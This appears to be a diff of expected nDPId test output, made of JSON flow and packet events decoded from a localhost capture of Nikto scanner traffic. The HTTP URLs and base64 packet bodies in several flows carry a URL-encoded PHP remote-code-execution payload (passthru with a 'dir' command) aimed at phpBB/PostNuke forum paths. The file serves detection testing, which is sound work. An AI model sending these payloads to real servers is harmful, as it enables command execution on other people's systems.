+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/99\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001346)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00869{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"ts_msec":1576420277741,"pkt":"AAAAAAAAAAAAAAAACABFAAFdQfFAAEAG+ad\/AAABfwAAAcaqH5DRIHj1tdpDy4AYAED\/UQAAAQEICp1m\/xWdZv8VR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM4OCkNCg0K"}
-01018{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}}
+01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001388)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00840{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"ts_msec":1576420277743,"pkt":"AAAAAAAAAAAAAAAACABFAAFGAG5AAEAGO0J\/AAABfwAAAcasH5AOKDl4jiUqhYAYAED\/OgAAAQEICp1m\/xedZv8XR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzg5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00995{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}}
+01184{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"ts_msec":1576420277743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001389)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00870{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"ts_msec":1576420277745,"pkt":"AAAAAAAAAAAAAAAACABFAAFddiRAAEAGxXR\/AAABfwAAAcauH5DeiE8\/TEH5WoAYAED\/UQAAAQEICp1m\/xmdZv8ZR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-01018{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"ts_msec":1576420277746,"pkt":"AAAAAAAAAAAAAAAACABFAAFmjyxAAEAGrGN\/AAABfwAAAcawH5C1dLY3dpi6dIAYAED\/WgAAAQEICp1m\/xqdZv8aR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"ts_msec":1576420277747,"pkt":"AAAAAAAAAAAAAAAACABFAAFrmeBAAEAGoap\/AAABfwAAAcayH5AmkqDEx1CXDIAYAED\/XwAAAQEICp1m\/xudZv8bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-01034{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"ts_msec":1576420277749,"pkt":"AAAAAAAAAAAAAAAACABFAAFlinpAAEAGsRZ\/AAABfwAAAca0H5BJbLNma4SLi4AYAED\/WQAAAQEICp1m\/x2dZv8dR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-01027{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"ts_msec":1576420277750,"pkt":"AAAAAAAAAAAAAAAACABFAAFjJWNAAEAGFjB\/AAABfwAAAca2H5CBThx9EGPplIAYAED\/VwAAAQEICp1m\/x6dZv8eR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
